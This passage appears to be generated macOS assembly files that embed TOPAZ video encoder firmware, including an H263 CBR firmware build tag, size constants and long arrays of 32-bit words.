.long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 2490393 ; 0x260019 .long 4128818 ; 0x3f0032 .long 5767243 ; 0x58004b .long 7405668 ; 0x710064 .long 9044093 ; 0x8a007d .long 10682518 ; 0xa30096 .long 12320943 ; 0xbc00af .long 13959368 ; 0xd500c8 .long 15597793 ; 0xee00e1 .long 17236218 ; 0x10700fa .long 17236231 ; 0x1070107 .long 17236231 ; 0x1070107 .long 17236231 ; 0x1070107 .long 17236231 ; 0x1070107 .long 17236231 ; 0x1070107 .long 263 ; 0x107 .long 16842752 ; 0x1010000 .long 50528770 ; 0x3030202 .long 84149252 ; 0x5040404 .long 101057797 ; 0x6060505 .long 117901062 ; 0x7070706 .long 134744071 ; 0x8080807 .long 151587080 ; 0x9090908 .long 657929 ; 0xa0a09 .long 33619968 ; 0x2010000 .long 67371779 ; 0x4040303 .long 101057797 ; 0x6060505 .long 134743815 ; 0x8080707 .long 168429833 ; 0xa0a0909 .long 185273099 ; 0xb0b0b0b .long 202116108 ; 0xc0c0c0c .long 855309 ; 0xd0d0d .long 4194304 ; 0x400000 .long 44761120 ; 0x2ab0020 .long 13434896 ; 0xcd0010 .long 38338901 ; 0x2490155 .long 29818888 ; 0x1c70008 .long 6095053 ; 0x5d00cd .long 20644181 ; 0x13b0155 .long 17891913 ; 0x1110249 .long 15794180 ; 0xf10004 .long 28246471 ; 0x1af01c7 .long 12779725 ; 0xc300cd .long 5832797 ; 0x59005d .long 2687317 ; 0x290155 .long 39780667 ; 0x25f013b .long 37028425 ; 0x2350249 .long 2162961 ; 0x210111 .long 2031618 ; 0x1f0002 .long 7667953 ; 0x7500f1 .long 7274951 ; 0x6f01c7 .long 6881711 ; 0x6901af .long 1638605 ; 0x1900cd .long 24969411 ; 0x17d00c3 .long 5963869 ; 0x5b005d .long 45678681 ; 0x2b90059 .long 10944853 ; 0xa70155 .long 42139689 ; 0x2830029 .long 20250939 ; 0x135013b .long 9765471 ; 0x95025f .long 37683785 ; 0x23f0249 .long 9110069 ; 0x8b0235 .long 35193105 ; 0x2190111 .long 4259873 ; 0x410021 .long 1 ; 0x1 .long 184944128 ; 0xb060600 .long 202050054 ; 0xc0b0a06 .long 168496134 ; 0xa0b0c06 .long 202181644 ; 0xc0d0c0c .long 218958854 ; 0xd0d0c06 .long 185273356 ; 0xb0b0c0c .long 235735565 ; 0xe0d0a0d .long 168627726 ; 0xa0d0e0e .long 202181126 ; 0xc0d0a06 .long 202247182 ; 0xc0e0c0e .long 235735565 ; 0xe0d0a0d .long 252447756 ; 0xf0c0c0c .long 252382478 ; 0xf0b0d0e .long 219090446 ; 0xd0f0e0e .long 219090703 ; 0xd0f0f0f .long 202051342 ; 0xc0b0f0e .long 6 ; 0x6 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 305445548 ; 0x1234baac .space 12028 .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "TOPAZ_DDKBUILD_00-00-00-0146" .section __DATA,__data .globl _szH263CBR_MTXTOPAZFW_buildtag ## @szH263CBR_MTXTOPAZFW_buildtag .p2align 3 _szH263CBR_MTXTOPAZFW_buildtag: .quad L_.str .globl _ui32H263CBR_MTXTOPAZFWTextSize ## @ui32H263CBR_MTXTOPAZFWTextSize .p2align 2 _ui32H263CBR_MTXTOPAZFWTextSize: .long 4500 ## 0x1194 .globl _ui32H263CBR_MTXTOPAZFWDataSize ## @ui32H263CBR_MTXTOPAZFWDataSize .p2align 2 _ui32H263CBR_MTXTOPAZFWDataSize: .long 3680 ## 0xe60 .globl _ui32H263CBR_MTXTOPAZFWDataLocation ## @ui32H263CBR_MTXTOPAZFWDataLocation .p2align 2 _ui32H263CBR_MTXTOPAZFWDataLocation: .long 2189969024 ## 0x82884680 .globl _aui32H263CBR_MTXTOPAZFWText ## @aui32H263CBR_MTXTOPAZFWText .p2align 4 _aui32H263CBR_MTXTOPAZFWText: .long 2420162561 ## 0x9040c001 .long 3356070910 ## 0xc80993fe .long 3221229122 ## 0xc0000e42 .long 3358133760 ## 0xc8290e00 .long 3306193954 ## 0xc5108422 .long 3358164000 ## 0xc8298420 .long 3295184418 ## 0xc4688622 .long 2659419648 ## 0x9e838600 .long 3356073539 ## 0xc8099e43 .long 3368553794 ## 0xc8c80d42 .long 3356036352 ## 0xc8090d00 .long 3368552770 ## 0xc8c80942 .long 3356035392 ## 0xc8090940 .long 3221884482 ## 0xc00a0e42 .long 3356036672 ## 0xc8090e40 .long 3222177730 ## 0xc00e87c2 .long 2618853328 ## 0x9c1887d0 .long 201459714 ## 0xc020802 .long 159518082 ## 0x9820d82 .long 151129346 ## 0x9020d02 .long 142740610 ## 0x8820c82 .long 2468413438 ## 0x9320fffe .long 2751580216 ## 0xa401c838 .long 230869001 ## 0xdc2c809 .long 230738118 ## 0xdc0c8c6 .long 239257609 ## 0xe42c809 .long 189182080 ## 0xb46b080 .long 2121578367 ## 0x7e74b77f .long 2760706178 ## 0xa48d0882 .long 4294942707 ## 0xffff9ff3 .long 2635305952 ## 0x9d1393e0 .long 4164518017 ## 0xf8398081 .long 117940741 ## 0x707a205 .long 109380359 ## 0x6850307 .long 58957463 ## 0x3839e97 .long 262145551 ## 0xfa0060f .long 26019213 ## 0x18d058d .long 2623668367 ## 0x9c62008f .long 2470510591 ## 0x9340ffff .long 245368331 ## 0xea0060b .long 4294941794 ## 0xffff9c62 .long 93164448 ## 0x58d93a0 .long 3070230925 ## 0xb700018d .long 3078640140 ## 0xb780520c .long 2617332116 ## 0x9c015194 .long 109553157 ## 0x687a605 .long 245368331 ## 0xea0060b .long 4294941794 ## 0xffff9c62 .long 4193817504 ## 0xf9f893a0 .long 4193823389 ## 0xf9f8aa9d .long 2619517469 ## 0x9c22aa1d .long 2785909794 ## 0xa60d9c22 .long 2617180148 ## 0x9bfefff4 .long 211994665 ## 0xca2c829 .long 209765648 ## 0xc80c510 .long 1078834976 ## 0x404db720 .long 172148745 ## 0xa42c809 .long 168871402 ## 0xa10c5ea .long 184710208 ## 0xb027440 .long 1116517760 ## 0x428cb580 .long 169005058 ## 0xa12d002 .long 1178907681 ## 0x4644b421 .long 3226733962 ## 0xc0540d8a .long 3078658224 ## 0xb78098b0 .long 3355923084 ## 0xc807528c .long 3312453826 ## 0xc57008c2 .long 3224504448 ## 0xc0320880 .long 3045067910 ## 0xb5800c86 .long 3022081164 ## 0xb4214c8c .long 168214528 ## 0xa06c000 .long 211337218 ## 0xc98c002 .long 3221271681 ## 0xc000b481 .long 151132676 ## 0x9021a04 .long 146456578 ## 0x8bac002 .long 1081653600 ## 0x4078b960 .long 167821824 ## 0xa00c200 .long 1485558308 ## 0x588bd224 .long 3221271617 ## 0xc000b441 .long 168939008 ## 0xa11ce00 .long 2466381823 ## 0x9301ffff .long 411361280 ## 0x1884e000 .long 2453995519 ## 0x9244ffff .long 172148743 ## 0xa42c807 .long 167822710 ## 0xa00c576 .long 210157618 ## 0xc86c032 .long 3221271681 ## 0xc000b481 .long 142739970 ## 0x8820a02 .long 142870786 ## 0x8840902 .long 1081653600 ## 0x4078b960 .long 167821824 ## 0xa00c200 .long 1485558308 ## 0x588bd224 .long 3221271617 ## 0xc000b441 .long 168939008 ## 0xa11ce00 .long 2466381823 ## 0x9301ffff .long 1952104452 ## 0x745ac004 .long 2453471231 ## 0x923cffff .long 3224635906 ## 0xc0340a02 .long 3028356254 ## 0xb4810c9e .long 3224682496 ## 0xc034c000 .long 3226769613 ## 0xc05498cd .long 3226769454 ## 0xc054982e .long 227186730 ## 0xd8a982a .long 2556543060 ## 0x9861c054 .long 172148737 ## 0xa42c801 .long 168345616 ## 0xa08c010 .long 210157618 ## 0xc86c032 .long 3221271681 ## 0xc000b481 .long 146982913 ## 0x8c2c801 .long 142658320 ## 0x880cb10 .long 3022064868 ## 0xb4210ce4 .long 168214528 ## 0xa06c000 .long 3028356276 ## 0xb4810cb4 .long 3240345600 ## 0xc123c000 .long 3311798482 ## 0xc56608d2 .long 3229616352 ## 0xc08008e0 .long 3022064770 ## 0xb4210c82 .long 436518912 ## 0x1a04c000 .long 3028356228 ## 0xb4810c84 .long 226934784 ## 0xd86c000 .long 218237378 ## 0xd0209c2 .long 151175457 ## 0x902c121 .long 2568732692 ## 0x991bc014 .long 1166849920 ## 0x458cb780 .long 2843931144 ## 0xa982f208 .long 218284065 ## 0xd02c021 .long 163712260 ## 0x9c20d04 .long 2567356436 ## 0x9906c014 .long 1166849920 ## 0x458cb780 .long 181584163 ## 0xad2c123 .long 182502758 ## 0xae0c566 .long 2843931144 ## 0xa982f208 .long 218499522 ## 0xd0609c2 .long 2566570004 ## 0x98fac014 .long 163712390 ## 0x9c20d86 .long 3246460174 ## 0xc1810d0e .long 3222538498 ## 0xc0140902 .long 3221395710 ## 0xc00298fe .long 3226734018 ## 0xc0540dc2 .long 1879742477 ## 0x700a980d .long 2472869887 ## 0x9364ffff .long 3226733954 ## 0xc0540d82 .long 3221461012 ## 0xc0039814 .long 3074462432 ## 0xb74092e0 .long 3525726980 ## 0xd2265304 .long 2653772040 ## 0x9e2d5908 .long 2857230384 ## 0xaa4de030 .long 2623708836 ## 0x9c629ea4 .long 1158985504 ## 0x4514b720 .long 1079883584 ## 0x405db740 .long 1489093248 ## 0x58c1c280 .long 713084912 ## 0x2a80cff0 .long 1512161920 ## 0x5a21c280 .long 2149708560 ## 0x8021f310 .long 1967046660 ## 0x753ec004 .long 1087223072 ## 0x40cdb520 .long 1078834560 ## 0x404db580 .long 1179825201 ## 0x4652b431 .long 172148737 ## 0xa42c801 .long 168345616 ## 0xa08c010 .long 210157618 ## 0xc86c032 .long 3221271681 ## 0xc000b481 .long 3221358726 ## 0xc0020886 .long 3022064792 ## 0xb4210c98 .long 3078668288 ## 0xb780c000 .long 3229631756 ## 0xc080450c .long 4060613762 ## 0xf2080c82 .long 3022104705 ## 0xb421a881 .long 226672640 ## 0xd82c000 .long 2614149172 ## 0x9bd0c034 .long 1158461312 ## 0x450cb780 .long 2827088392 ## 0xa881f208 .long 4294930434 ## 0xffff7002 .long 226923268 ## 0xd869304 .long 218237378 ## 0xd0209c2 .long 151175457 ## 0x902c121 .long 2561654804 ## 0x98afc014 .long 1166849920 ## 0x458cb780 .long 2843931144 ## 0xa982f208 .long 218284065 ## 0xd02c021 .long 163712260 ## 0x9c20d04 .long 2560278548 ## 0x989ac014 .long 1166849920 ## 0x458cb780 .long 2843931144 ## 0xa982f208 .long 218499522 ## 0xd0609c2 .long 2559754260 ## 0x9892c014 .long 163712390 ## 0x9c20d86 .long 3238071566 ## 0xc1010d0e .long 3222538498 ## 0xc0140902 .long 2000722070 ## 0x77409896 .long 2424487936 ## 0x9082c000 .long 2608447540 ## 0x9b79c034 .long 2625685873 ## 0x9c80c971 .long 1514267136 ## 0x5a41e200 .long 2449784832 ## 0x9204c000 .long 230866946 ## 0xdc2c002 .long 2610610228 ## 0x9b9ac034 .long 1158461312 ## 0x450cb780 .long 2827088392 ## 0xa881f208 .long 4294930434 ## 0xffff7002 .long 226661092 ## 0xd8292e4 .long 2610806836 ## 0x9b9dc034 .long 3221255552 ## 0xc0007580 .long 3224671076 ## 0xc0349364 .long 227187550 ## 0xd8a9b5e .long 2610282548 ## 0x9b95c034 .long 1158461312 ## 0x450cb780 .long 2827088392 ## 0xa881f208 .long 1493749928 ## 0x5908d0a8 .long 155766899 ## 0x948d073 .long 3761282605 ## 0xe0309e2d .long 3555830477 ## 0xd3f1aacd .long 3254790748 ## 0xc2002a5c .long 1964530181 ## 0x75185a05 .long 718458898 ## 0x2ad2d012 .long 2452946939 ## 0x9234fffb .long 3080652802 ## 0xb79f0802 .long 3082780398 ## 0xb7bf7eee .long 3084877678 ## 0xb7df7f6e .long 2355134446 ## 0x8c607fee .long 2619513890 ## 0x9c229c22 .long 1159509824 ## 0x451cb740 .long 3254823489 ## 0xc200aa41 .long 3221379592 ## 0xc0025a08 .long 4077914624 ## 0xf3100a00 .long 4060643361 ## 0xf2088021 .long 4060653698 ## 0xf208a882 .long 3233851525 ## 0xc0c0a885 .long 1552485504 ## 0x5c890c80 .long 3221271585 ## 0xc000b421 .long 2785385506 ## 0xa6059c22 .long 1159509824 ## 0x451cb740 .long 143043137 ## 0x886aa41 .long 211730484 ## 0xc9ec034 .long 1510523392 ## 0x5a08c200 .long 167821314 ## 0xa00c002 .long 2158097168 ## 0x80a1f310 .long 3221271585 ## 0xc000b421 .long 210944128 ## 0xc92c080 .long 2854613512 ## 0xaa25f208 .long 3221271681 ## 0xc000b481 .long 3224636866 ## 0xc0340dc2 .long 4060650303 ## 0xf2089b3f .long 1879616037 ## 0x7008aa25 .long 2470772735 ## 0x9344ffff .long 3229616642 ## 0xc0800a02 .long 3028356246 ## 0xb4810c96 .long 226934784 ## 0xd86c000 .long 218499522 ## 0xd0609c2 .long 151175457 ## 0x902c121 .long 2551955476 ## 0x981bc014 .long 2846028296 ## 0xa9a2f208 .long 218284065 ## 0xd02c021 .long 163712260 ## 0x9c20d04 .long 2550710292 ## 0x9808c014 .long 2137962399 ## 0x7f6eb79f .long 2146351039 ## 0x7feeb7bf .long 2619509824 ## 0x9c228c40 .long 3225460308 ## 0xc0409e54 .long 2656636034 ## 0x9e590c82 .long 3221271585 ## 0xc000b421 .long 218284096 ## 0xd02c040 .long 3221271682 ## 0xc000b482 .long 3222182946 ## 0xc00e9c22 .long 3222154620 ## 0xc00e2d7c .long 1563437536 ## 0x5d3029e0 .long 3225460308 ## 0xc0409e54 .long 834145410 ## 0x31b80c82 .long 3221271649 ## 0xc000b461 .long 218284096 ## 0xd02c040 .long 3221271618 ## 0xc000b442 .long 2655820834 ## 0x9e4c9c22 .long 687652878 ## 0x28fcc00e .long 712818702 ## 0x2a7cc00e .long 209895488 ## 0xc82c040 .long 3020004952 ## 0xb4019e58 .long 3254829056 ## 0xc200c000 .long 1491360364 ## 0x58e45a6c .long 486814274 ## 0x1d043242 .long 2656132368 ## 0x9e515d10 .long 428104077 ## 0x1984598d .long 964739089 ## 0x3980c011 .long 1494037062 ## 0x590d3246 .long 1496324356 ## 0x59301904 .long 843330114 ## 0x32443242 .long 3221271681 ## 0xc000b481 .long 2655820834 ## 0x9e4c9c22 .long 687652878 ## 0x28fcc00e .long 712818702 ## 0x2a7cc00e .long 209895488 ## 0xc82c040 .long 3020004952 ## 0xb4019e58 .long 3254829056 ## 0xc200c000 .long 1491360364 ## 0x58e45a6c .long 486814274 ## 0x1d043242 .long 2656132368 ## 0x9e515d10 .long 428104077 ## 0x1984598d .long 964739097 ## 0x3980c019 .long 1494037062 ## 0x590d3246 .long 1496324356 ## 0x59301904 .long 843330114 ## 0x32443242 .long 3221271681 ## 0xc000b481 .long 2655820834 ## 0x9e4c9c22 .long 687652878 ## 0x28fcc00e .long 712818702 ## 0x2a7cc00e .long 209895488 ## 0xc82c040 .long 3020004952 ## 0xb4019e58 .long 3254829056 ## 0xc200c000 .long 1491360364 ## 0x58e45a6c .long 486814274 ## 0x1d043242 .long 2656132368 ## 0x9e515d10 .long 428104077 ## 0x1984598d .long 964739101 ## 0x3980c01d .long 1494037062 ## 0x590d3246 .long 1496324356 ## 0x59301904 .long 843330114 ## 0x32443242 .long 3221271681 ## 0xc000b481 .long 2785909794 ## 0xa60d9c22 .long 117670944 ## 0x7038420 .long 3263170183 ## 0xc2800687 .long 478436493 ## 0x1c845c8d .long 1554043042 ## 0x5ca0d0a2 .long 3490775687 ## 0xd0110287 .long 3254782558 ## 0xc2000a5e .long 436492813 ## 0x1a045a0d .long 1513144832 ## 0x5a30c200 .long 815291600 ## 0x30985cd0 .long 67477068 ## 0x4059e4c .long 210419762 ## 0xc8ac032 .long 3355521176 ## 0xc8013098 .long 3022076032 ## 0xb4213880 .long 2661924864 ## 0x9ea9c000 .long 167954433 ## 0xa02c801 .long 167821314 ## 0xa00c002 .long 3224397139 ## 0xc0306553 .long 3028356234 ## 0xb4810c8a .long 3221405696 ## 0xc002c000 .long 209979522 ## 0xc840882 .long 3221271585 ## 0xc000b421 .long 3491929747 ## 0xd0229e93 .long 2656263945 ## 0x9e535f09 .long 486825229 ## 0x1d045d0d .long 2606432244 ## 0x9b5afff4 .long 1586610816 ## 0x5e91c280 .long 3263176324 ## 0xc2801e84 .long 2657902212 ## 0x9e6c5e84 .long 3263175300 ## 0xc2801a84 .long 3246480016 ## 0xc1815a90 .long 227162752 ## 0xd8a3a80 .long 218237314 ## 0xd020982 .long 4294193482 ## 0xfff4314a .long 3233848148 ## 0xc0c09b54 .long 160566658 ## 0x9920d82 .long 218284034 ## 0xd02c002 .long 151175170 ## 0x902c002 .long 2588393524 ## 0x9a47c034 .long 3224635914 ## 0xc0340a0a .long 3028356254 ## 0xb4810c9e .long 453296128 ## 0x1b04c000 .long 2231530943 ## 0x850275bf .long 2449653760 ## 0x9202c000 .long 3042942415 ## 0xb55f9dcf .long 3224665980 ## 0xc0347f7c .long 4063337039 ## 0xf2319a4f .long 3076497477 ## 0xb75fa045 .long 453279612 ## 0x1b047f7c .long 2232448447 ## 0x851075bf .long 2458189823 ## 0x9284ffff .long 3224373762 ## 0xc0300a02 .long 3028356238 ## 0xb4810c8e .long 3080699904 ## 0xb79fc000 .long 3082780270 ## 0xb7bf7e6e .long 3084877550 ## 0xb7df7eee .long 3221389166 ## 0xc0027f6e .long 2619509760 ## 0x9c228c00 .long 3078661637 ## 0xb780a605 .long 3221504908 ## 0xc004438c .long 1962945024 ## 0x75002a00 .long 1510782880 ## 0x5a0cb7a0 .long 2462236674 ## 0x92c2c002 .long 2847339016 ## 0xa9b6f208 .long 159563856 ## 0x982c050 .long 226410504 ## 0xd7ec008 .long 2601058292 ## 0x9b08fff4 .long 2847863304 ## 0xa9bef208 .long 159563816 ## 0x982c028 .long 222216196 ## 0xd3ec004 .long 2600534004 ## 0x9b00fff4 .long 1133295488 ## 0x438cb780 .long 952160785 ## 0x38c0d211 .long 33791625 ## 0x2039e89 .long 704692737 ## 0x2a00c201 .long 3489297664 ## 0xcffa7500 .long 3038784765 ## 0xb5202cfd .long 3221308308 ## 0xc0014394 .long 1950388450 ## 0x744090e2 .long 1519171392 ## 0x5a8cb740 .long 2455158784 ## 0x9256c000 .long 2856710152 ## 0xaa45f008 .long 2831806472 ## 0xa8c9f008 .long 754894847 ## 0x2cfec7ff .long 167821328 ## 0xa00c010 .long 2722492424 ## 0xa245f008 .long 142655496 ## 0x880c008 .long 2697588744 ## 0xa0c9f008 .long 1133819168 ## 0x4394b520 .long 2856710152 ## 0xaa45f008 .long 1133295392 ## 0x438cb720 .long 2721444360 ## 0xa235f208 .long 2831872008 ## 0xa8caf008 .long 687787519 ## 0x28fecdff .long 2696868360 ## 0xa0bef208 .long 1133294880 ## 0x438cb520 .long 2453716992 ## 0x9240c000 .long 2839015944 ## 0xa937f208 .long 2855924232 ## 0xaa39f208 .long 2839343626 ## 0xa93cf20a .long 2829185608 ## 0xa8a1f248 .long 2149708560 ## 0x8021f310 .long 2191778320 ## 0x82a3e210 .long 2721444360 ## 0xa235f208 .long 2696802824 ## 0xa0bdf208 .long 2847863368 ## 0xa9bef248 .long 159563778 ## 0x982c002 .long 4294184206 ## 0xfff40d0e .long 4064844469 ## 0xf2489ab5 .long 3072371261 ## 0xb720aa3d .long 3221373836 ## 0xc002438c .long 4064807424 ## 0xf2480a00 .long 3254821437 ## 0xc200a23d .long 3038787712 ## 0xb5203880 .long 3222356876 ## 0xc011438c .long 1950361728 ## 0x74402880 .long 2464333824 ## 0x92e2c000 .long 2847339080 ## 0xa9b6f248 .long 159563784 ## 0x982c008 .long 4294184254 ## 0xfff40d3e .long 4064844445 ## 0xf2489a9d .long 3072371253 ## 0xb720aa35 .long 3221767052 ## 0xc008438c .long 4064807424 ## 0xf2480a00 .long 3229721141 ## 0xc081a235 .long 3488561280 ## 0xcfef3880 .long 3038783742 ## 0xb52028fe .long 3078636428 ## 0xb780438c .long 3221308300 ## 0xc001438c .long 1962945028 ## 0x75002a04 .long 2464333824 ## 0x92e2c000 .long 2847339080 ## 0xa9b6f248 .long 159563784 ## 0x982c008 .long 4294184254 ## 0xfff40d3e .long 4064844417 ## 0xf2489a81 .long 3072371253 ## 0xb720aa35 .long 3221767052 ## 0xc008438c .long 4064807424 ## 0xf2480a00 .long 3221332533 ## 0xc001a235 .long 3489609864 ## 0xcfff3888 .long 3038783738 ## 0xb52028fa .long 3072344972 ## 0xb720438c .long 33768332 ## 0x203438c .long 705740801 ## 0x2a10c001 .long 3221386496 ## 0xc0027500 .long 3221328002 ## 0xc0019082 .long 1950361792 ## 0x744028c0 .long 2441265153 ## 0x9182c001 .long 2846290568 ## 0xa9a6f288 .long 218499522 ## 0xd0609c2 .long 209848642 ## 0xc820942 .long 4294183042 ## 0xfff40882 .long 4069038742 ## 0xf2889a96 .long 4069042614 ## 0xf288a9b6 .long 1569761575 ## 0x5d90a927 .long 2175787552 ## 0x81afe220 .long 1133295488 ## 0x438cb780 .long 218499522 ## 0xd0609c2 .long 209848642 ## 0xc820942 .long 3221293186 ## 0xc0010882 .long 3045079584 ## 0xb5803a20 .long 4294198156 ## 0xfff4438c .long 3078658720 ## 0xb7809aa0 .long 4069016460 ## 0xf288438c .long 3221465253 ## 0xc003a8a5 .long 146815488 ## 0x8c03a00 .long 2695230088 ## 0xa0a5f288 .long 707710975 ## 0x2a2ecfff .long 2455814144 ## 0x9260c000 .long 2846290568 ## 0xa9a6f288 .long 218499522 ## 0xd0609c2 .long 2587295732 ## 0x9a36fff4 .long 1133295488 ## 0x438cb780 .long 2829447816 ## 0xa8a5f288 .long 975224833 ## 0x3a20c001 .long 4069001408 ## 0xf28808c0 .long 3489636517 ## 0xcfffa0a5 .long 3045075566 ## 0xb5802a6e .long 3080668044 ## 0xb79f438c .long 3082780526 ## 0xb7bf7f6e .long 2353037294 ## 0x8c407fee .long 2785385506 ## 0xa6059c22 .long 1133295488 ## 0x438cb780 .long 704692736 ## 0x2a00c200 .long 2656924928 ## 0x9e5d7500 .long 2466430976 ## 0x9302c000 .long 180120206 ## 0xabc6a8e .long 159555243 ## 0x9829eab .long 3238071606 ## 0xc1010d36 .long 3222538498 ## 0xc0140902 .long 2662045860 ## 0x9eab98a4 .long 1133295488 ## 0x438cb780 .long 219810178 ## 0xd1a0982 .long 151175425 ## 0x902c101 .long 712887806 ## 0x2a7dcdfe .long 1133294976 ## 0x438cb580 .long 2560081940 ## 0x9897c014 .long 1133295488 ## 0x438cb780 .long 704692353 ## 0x2a00c081 .long 3221255424 ## 0xc0007500 .long 3238105634 ## 0xc1019222 .long 3221620994 ## 0xc0060902 .long 231606592 ## 0xdce0940 .long 218237314 ## 0xd020982 .long 2559033364 ## 0x9887c014 .long 1133295488 ## 0x438cb780 .long 712953727 ## 0x2a7ecf7f .long 1133294976 ## 0x438cb580 .long 1133295488 ## 0x438cb780 .long 705216513 ## 0x2a08c001 .long 3221255424 ## 0xc0007500 .long 3238105634 ## 0xc1019222 .long 3221620994 ## 0xc0060902 .long 232655168 ## 0xdde0940 .long 218237314 ## 0xd020982 .long 2557591572 ## 0x9871c014 .long 1133295488 ## 0x438cb780 .long 712429567 ## 0x2a76cfff .long 1133294976 ## 0x438cb580 .long 1133295488 ## 0x438cb780 .long 706789377 ## 0x2a20c001 .long 3221255424 ## 0xc0007500 .long 232952290 ## 0xde291e2 .long 218237314 ## 0xd020982 .long 151175425 ## 0x902c101 .long 2556280852 ## 0x985dc014 .long 1133295488 ## 0x438cb780 .long 710856703 ## 0x2a5ecfff .long 1133294976 ## 0x438cb580 .long 1133295488 ## 0x438cb780 .long 704692227 ## 0x2a00c003 .long 3221255424 ## 0xc0007500 .long 232952290 ## 0xde291e2 .long 218499458 ## 0xd060982 .long 151175425 ## 0x902c101 .long 2554970132 ## 0x9849c014 .long 1133295488 ## 0x438cb780 .long 712953853 ## 0x2a7ecffd .long 1133294976 ## 0x438cb580 .long 2137962399 ## 0x7f6eb79f .long 2146351039 ## 0x7feeb7bf .long 2619509824 ## 0x9c228c40 .long 3080758789 ## 0xb7a0a605 .long 4064827916 ## 0xf2485a0c .long 3223431610 ## 0xc021a9ba .long 222039298 ## 0xd3c0d02 .long 159563784 ## 0x982c008 .long 2577334260 ## 0x999efff4 .long 2846552712 ## 0xa9aaf288 .long 218284065 ## 0xd02c021 .long 163712260 ## 0x9c20d04 .long 2576809972 ## 0x9996fff4 .long 2855924296 ## 0xaa39f248 .long 2829709960 ## 0xa8a9f288 .long 167821320 ## 0xa00c008 .long 2721706568 ## 0xa239f248 .long 4069001408 ## 0xf28808c0 .long 3080691881 ## 0xb79fa0a9 .long 3082780526 ## 0xb7bf7f6e .long 2353037294 ## 0x8c407fee .long 2785385506 ## 0xa6059c22 .long 160564871 ## 0x9920687 .long 218284034 ## 0xd02c002 .long 151175170 ## 0x902c002 .long 2558771252 ## 0x9883c034 .long 172146690 ## 0xa42c002 .long 3263172272 ## 0xc2800eb0 .long 3028639369 ## 0xb4855e89 .long 3080699904 ## 0xb79fc000 .long 3082780526 ## 0xb7bf7f6e .long 2353037294 ## 0x8c407fee .long 3074464802 ## 0xb7409c22 .long 3517336708 ## 0xd1a64c84 .long 2653773064 ## 0x9e2d5d08 .long 2832064560 ## 0xa8cde030 .long 1510785152 ## 0x5a0cc080 .long 3522386053 ## 0xd1f35885 .long 3222153488 ## 0xc00e2910 .long 3793759612 ## 0xe2202d7c .long 3222176045 ## 0xc00e812d .long 1563437632 ## 0x5d302a40 .long 843226705 ## 0x32429e51 .long 209895488 ## 0xc82c040 .long 3221271681 ## 0xc000b481 .long 218284096 ## 0xd02c040 .long 3221271618 ## 0xc000b442 .long 3074464802 ## 0xb7409c22 .long 502291204 ## 0x1df05b04 .long 1560859046 ## 0x5d08d1a6 .long 3761282605 ## 0xe0309e2d .long 3229657293 ## 0xc080a8cd .long 3493026309 ## 0xd0335a05 .long 1502685518 ## 0x5991294e .long 8989116 ## 0x8929bc .long 2175263248 ## 0x81a7e210 .long 688968179 ## 0x2910d1f3 .long 763150350 ## 0x2d7cc00e .long 2167267872 ## 0x812de220 .long 1563449744 ## 0x5d305990 .long 834182740 ## 0x31b89e54 .long 209895488 ## 0xc82c040 .long 3221271649 ## 0xc000b461 .long 218284096 ## 0xd02c040 .long 3221271618 ## 0xc000b442 .long 2785385506 ## 0xa6059c22 .long 1510782880 ## 0x5a0cb7a0 .long 243450129 ## 0xe82c111 .long 247513166 ## 0xec0c04e .long 2847339016 ## 0xa9b6f208 .long 159563856 ## 0x982c050 .long 226410504 ## 0xd7ec008 .long 2568945652 ## 0x991efff4 .long 234004074 ## 0xdf29e6a .long 159563780 ## 0x982c004 .long 4294184194 ## 0xfff40d02 .long 4060650440 ## 0xf2089bc8 .long 4064848183 ## 0xf248a937 .long 3793791402 ## 0xe220a9aa .long 3226501551 ## 0xc05081af .long 3221752194 ## 0xc0080982 .long 4294184318 ## 0xfff40d7e .long 2657786123 ## 0x9e6a990b .long 3221491186 ## 0xc0040df2 .long 218237378 ## 0xd0209c2 .long 2612396020 ## 0x9bb5fff4 .long 2839015944 ## 0xa937f208 .long 2846552648 ## 0xa9aaf248 .long 2167325185 ## 0x812ec201 .long 2175787552 ## 0x81afe220 .long 159563856 ## 0x982c050 .long 226410504 ## 0xd7ec008 .long 2566324212 ## 0x98f6fff4 .long 234004074 ## 0xdf29e6a .long 159563782 ## 0x982c006 .long 4294184194 ## 0xfff40d02 .long 4060650400 ## 0xf2089ba0 .long 3487082942 ## 0xcfd8a9be .long 3223850625 ## 0xc0280e81 .long 3221490050 ## 0xc0040982 .long 4294184254 ## 0xfff40d3e .long 2657786085 ## 0x9e6a98e5 .long 3221491186 ## 0xc0040df2 .long 3221490050 ## 0xc0040982 .long 4294184258 ## 0xfff40d42 .long 4060650382 ## 0xf2089b8e .long 4064848191 